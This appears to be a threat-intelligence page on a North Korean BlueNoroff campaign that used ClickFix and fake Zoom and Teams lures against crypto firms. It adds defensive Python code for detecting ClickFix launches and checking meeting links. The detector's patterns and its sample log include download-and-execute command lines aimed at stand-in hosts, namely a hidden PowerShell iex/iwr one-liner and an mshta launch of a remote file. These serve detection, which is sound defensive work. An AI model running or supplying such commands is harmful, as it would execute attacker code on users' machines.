North Korean Hackers Target Crypto Firms with ClickFix and AI-Led Lures
2026-04-28 08:00 | Severity: CRITICAL / HIGH
Executive Summary (AI-generated)
Arctic Wolf Labs has attributed, with high confidence, a large-scale cyber theft campaign against cryptocurrency organizations to BlueNoroff, a subgroup of the North Korea-linked Lazarus Group. The campaign targeted over 100 organizations across more than 20 countries; the first intrusion Arctic Wolf detected was at a North American cryptocurrency company, beginning January 23, 2026. Initial access relied on spear-phishing: impersonation of prominent fintech figures, typosquatted Zoom and Microsoft Teams meeting links, fake Calendly calendar invites and ClickFix-style clipboard injection. Webcam footage exfiltrated from victims was merged with AI-generated images to produce fake meeting content, a self-sustaining deepfake pipeline hosted on attacker infrastructure alongside compromised media from 100 additional targets. Post-compromise tooling included a PowerShell-based C2 implant, an AES-encrypted browser injection payload and screenshot exfiltration via the Telegram Bot API. The activity continues the group's SnatchCrypto operation, active since at least 2017, and shows that Lazarus and its affiliates still pursue financial gain against the cryptocurrency and web3 ecosystem.
Technical Mitigations (AI-generated)
• ClickFix lures depend on the victim pasting an attacker-supplied command into the Run dialog, a terminal or PowerShell. Restrict or monitor interactive powershell.exe, cmd.exe and mshta.exe launches whose parent is explorer.exe or a browser, and alert on command lines that download and execute remote content (iex/Invoke-WebRequest, -EncodedCommand, mshta with a URL).
• Treat unsolicited meeting links and calendar invites as untrusted: verify that Zoom, Microsoft Teams and Calendly URLs sit under the vendors' real domains before joining, and confirm unexpected invites from prominent contacts through a second channel, since the campaign impersonated fintech figures.
• Enforce multi-factor authentication (MFA) and strong password policies, and keep operating systems, browsers and endpoint protection fully patched. These controls do not stop a command the user executes by hand, so they complement rather than replace the two above.
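As an added example for the first mitigation (not code from the article or from Arctic Wolf), the following Python flags ClickFix-style launches in process-creation telemetry. The event records are constructed for illustration and use Sysmon Event ID 1 field names (Image, ParentImage, CommandLine, User); the marker weights, the parent/child image sets and the threshold are tuning assumptions, not published indicators from the report.

```python
"""Flag ClickFix-style "paste this into Run" launches in process-creation telemetry.

Added example for this page, not code from Arctic Wolf or the article. The events
below are constructed and use Sysmon Event ID 1 field names (Image, ParentImage,
CommandLine, User); marker weights and the threshold are tuning assumptions.
"""
from __future__ import annotations

import json
import re
from typing import Iterable

# Interpreters a ClickFix lure typically instructs the victim to paste into.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Parents that indicate a user-driven launch: the Win+R Run dialog is hosted by
# explorer.exe, and some variants chain straight out of the browser.
USER_LAUNCH_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Command-line markers of download-and-execute; each match adds its weight.
MARKERS: list[tuple[re.Pattern[str], int]] = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 3),
    (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|certutil)\b", re.I), 2),
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), 2),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 2),
    (re.compile(r"\bmshta\b", re.I), 3),
    (re.compile(r"https?://", re.I), 1),
    # The fake "verification" text lures append as a comment so the victim sees it
    # in the Run dialog, e.g. '# I am not a robot'.
    (re.compile(r"#.*(robot|captcha|verif)", re.I), 3),
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_command(cmdline: str) -> tuple[int, list[str]]:
    """Score a command line and list the marker patterns that matched."""
    score, hits = 0, []
    for pattern, weight in MARKERS:
        if pattern.search(cmdline):
            score += weight
            hits.append(pattern.pattern)
    return score, hits


def detect_clickfix(events: Iterable[dict], threshold: int = 4) -> list[dict]:
    """Return findings for user-launched shells whose command line scores >= threshold."""
    findings = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        # Scheduled tasks, services and other non-interactive parents are left to
        # other rules; ClickFix is specifically a user-typed or pasted launch.
        if image not in SHELL_IMAGES or parent not in USER_LAUNCH_PARENTS:
            continue
        score, hits = score_command(ev.get("CommandLine", ""))
        if score >= threshold:
            findings.append({"user": ev.get("User"), "parent": parent, "image": image,
                             "score": score, "hits": hits})
    return findings


# Constructed sample events (JSON lines), not real telemetry.
SAMPLE_LOG = r"""
{"User": "CORP\\analyst", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iex (iwr https://zoom-meeting.example.invalid/fix.ps1).Content\" # I am not a robot"}
{"User": "CORP\\admin", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
{"User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -enc SQBFAFgA"}
{"User": "CORP\\trader", "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://teams-join.example.invalid/update.hta"}
"""
SAMPLE_EVENTS = [json.loads(line) for line in SAMPLE_LOG.strip().splitlines()]

if __name__ == "__main__":
    for finding in detect_clickfix(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, the analyst's pasted PowerShell one-liner and the trader's browser-spawned mshta launch are flagged; the admin opening a bare PowerShell console scores zero, and the service-spawned encoded command is skipped because its parent is not interactive. The parent-process gate is what keeps this rule quiet on a fleet where administrators run PowerShell all day.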
Intelligence Metadata
Actors / Malware / CVEs / Campaigns: Lazarus Group; APT38 (BlueNoroff); campaign: SnatchCrypto operation, a spear-phishing campaign spanning over 20 countries
Target & Sectors: North America (United States); finance; media
Incident Timeline
at least 2017
The SnatchCrypto operation, active since at least 2017, is the long-running campaign under which North Korean hackers have targeted cryptocurrency firms, most recently with ClickFix and AI-made Zoom lures.
The group first gained notoriety via the 2016 Bangladesh Bank SWIFT heist, in which the group attempted to steal $951m, successfully transferring $81m. "The group has since pivoted toward targeting the cryptocurrency and web3 ecosystem through its long-running SnatchCrypto operation, which has been active since at least 2017," added Arctic Wolf Labs researchers.
January 23, 2026
Spear-phishing via typosquatted links and fake meeting invites (MITRE ATT&CK T1566, Phishing): Arctic Wolf Labs first detected an intrusion by the attackers at a North American cryptocurrency company, beginning January 23, 2026.
A spear-phishing campaign spanning over 20 countries: when Arctic Wolf Labs researchers further analyzed the infrastructure supporting this operation and the trail left by the threat actor, they identified 100 additional targets whose compromised media was hosted on attacker infrastructure.
January 2026
In a January 2026 report by Picus Security, BlueNoroff is described as "the financial cybercrime arm of Lazarus," which has itself been publicly attributed to North Korea's Reconnaissance General Bureau (RGB).
March 2026
According to Arctic Wolf, BlueNoroff is a subgroup of the Lazarus Group and is known under many aliases, including APT38, Sapphire Sleet, TA444, Stardust Chollima, CageyChameleon and Nickel Gladstone.
The threat group's media server also hosted over 950 files, revealing "a self-sustaining deepfake pipeline," in which exfiltrated victim webcam footage was merged with AI-generated images to create fake meeting content, said the Arctic Wolf report.
The researchers found evidence of a PowerShell-based command-and-control (C2) implant, an AES-encrypted browser injection payload and a Telegram Bot API screenshot exfiltration mechanism.
April 27
Arctic Wolf Labs researchers, who shared a detailed analysis of the full attack lifecycle in a report published on April 27, attributed the campaign "with high confidence" to BlueNoroff, a hacking team tied to the North Korea-linked Lazarus Group. The targets were crypto firms; the DPRK (Korea, Democratic People's Republic of) is the attackers' origin, not a target region.
2026/04/28
North Korean Hackers Target Crypto Firms with ClickFix and AI-Made Zoom Lures.
A team of hackers associated with the North Korea-linked Lazarus Group has conducted a large-scale cyber theft campaign targeting over 100 cryptocurrency organizations across more than 20 countries, according to Arctic Wolf.
The spear-phishing campaign involved multiple social engineering techniques, including impersonating prominent figures of the fintech industry, typosquatted Zoom and Microsoft Teams meeting links, fake Calendly calendar invites and ClickFix-style clipboard injection attacks.
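The typosquatted Zoom, Teams and Calendly links above are the cheapest part of the lure to check before a user clicks. As an added example (not tooling from the article or from Arctic Wolf), this Python triages a meeting URL: it is trusted only when served over https under one of the vendors' domains, and anything else is explained with a reason (edit distance to a real domain, a brand keyword on a foreign host, punycode, plain http). The trusted-domain list, the brand keywords and the sample URLs are assumptions constructed for illustration, and the registrable-domain helper is deliberately naive.

```python
"""Triage a meeting or scheduling link before joining: is it really Zoom, Teams or Calendly?

Added example for this page, not tooling from Arctic Wolf or the article. The trusted
domain list and the sample URLs are assumptions constructed for illustration; the
registrable-domain helper is deliberately naive (last two labels).
"""
from __future__ import annotations

from urllib.parse import urlparse

# Domains under which each service's meeting/scheduling links are trusted (assumed set).
TRUSTED_DOMAINS = {
    "zoom": {"zoom.us", "zoom.com"},
    "teams": {"teams.microsoft.com", "teams.live.com"},
    "calendly": {"calendly.com"},
}
BRAND_KEYWORDS = ("zoom", "teams", "microsoft", "calendly")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small value between a host and a trusted domain suggests a typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Naive eTLD+1: the last two labels. Adequate for the .us/.com domains above and
    wrong for ccSLDs such as .co.uk, an accepted simplification in this example."""
    return ".".join(host.split(".")[-2:])


def check_meeting_link(url: str) -> dict:
    """Return a verdict: trusted only if https and under a trusted domain; otherwise reasons."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    verdict: dict = {"url": url, "host": host, "trusted": False, "reasons": []}
    if not host:
        verdict["reasons"].append("no host in URL")
        return verdict
    if parts.scheme != "https":
        verdict["reasons"].append(f"scheme {parts.scheme!r} is not https")
    if host.startswith("xn--") or ".xn--" in host:
        verdict["reasons"].append("punycode label (possible homoglyph domain)")
    for brand, domains in TRUSTED_DOMAINS.items():
        if any(host == d or host.endswith("." + d) for d in domains):
            verdict["brand"] = brand
            verdict["trusted"] = not verdict["reasons"]
            return verdict
    # Not a trusted host: does it imitate one?
    reg = registrable(host)
    for domains in TRUSTED_DOMAINS.values():
        for d in domains:
            if levenshtein(reg, registrable(d)) <= 2:
                verdict["reasons"].append(f"{reg!r} is within edit distance 2 of {d!r}")
    for kw in BRAND_KEYWORDS:
        if kw in host:
            verdict["reasons"].append(f"brand keyword {kw!r} outside its trusted domain")
    if not verdict["reasons"]:
        verdict["reasons"].append("unknown host")
    return verdict


# Constructed sample invites, not real lures.
SAMPLE_LINKS = [
    "https://us05web.zoom.us/j/123456789",
    "https://zoorn.us/j/123456789",
    "https://zoom-meeting-join.example.invalid/j/1",
    "http://calendly.com/ceo/30min",
    "https://teams.microsoft.com/l/meetup-join/19%3ameeting_abc",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        v = check_meeting_link(link)
        print("TRUSTED " if v["trusted"] else "SUSPECT ", link, v["reasons"])
```

Suffix matching on the registrable domain is what matters here: a host like zoom.us.attacker.example ends with the attacker's domain, not with ".zoom.us", so it is rejected, while legitimate regional subdomains such as us05web.zoom.us pass. In a mail gateway or browser extension the same check would run on the link target, not on the displayed text, since the displayed text is the part the lure controls.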
Tactical Metrics
• Financial: $951,000,000 attempted in the 2016 Bangladesh Bank SWIFT heist, of which $81m was successfully transferred.
• Victims: 100 additional targets whose compromised media was hosted on attacker infrastructure, in a spear-phishing campaign spanning over 20 countries and over 100 cryptocurrency organizations.
• Data breach: over 950 files on the group's media server, exfiltrated victim webcam footage merged with AI-generated images to create fake meeting content.
Intelligence Sources
Infosecurity-Magazine, 2026-04-28: North Korean Hackers Target Crypto Firms with ClickFix and AI-Made Zoom Lures
Last Updated: 2026-06-29T06:09
Comprehensive Tactical Telemetry
Highly correlated entities (mention counts on the source page):
• BlueNoroff, organisation: 13x
• April 27, date: 6x
• United States, target country: 4x
• Lazarus Group, APT group: 2x
• Media, targeted sector: 2x
• T1566 - Phishing, MITRE ATT&CK technique: 2x
Contextual telemetry:
• Origin: Korea, Democratic People's Republic of (DPRK)
• Countries targeted: over 20
• 2016 Bangladesh Bank SWIFT heist: $951,000,000 attempted, $81m transferred
• Campaign: SnatchCrypto operation (spear-phishing campaign spanning over 20 countries)
• Additional targets: 100
• Files on attacker media server: 950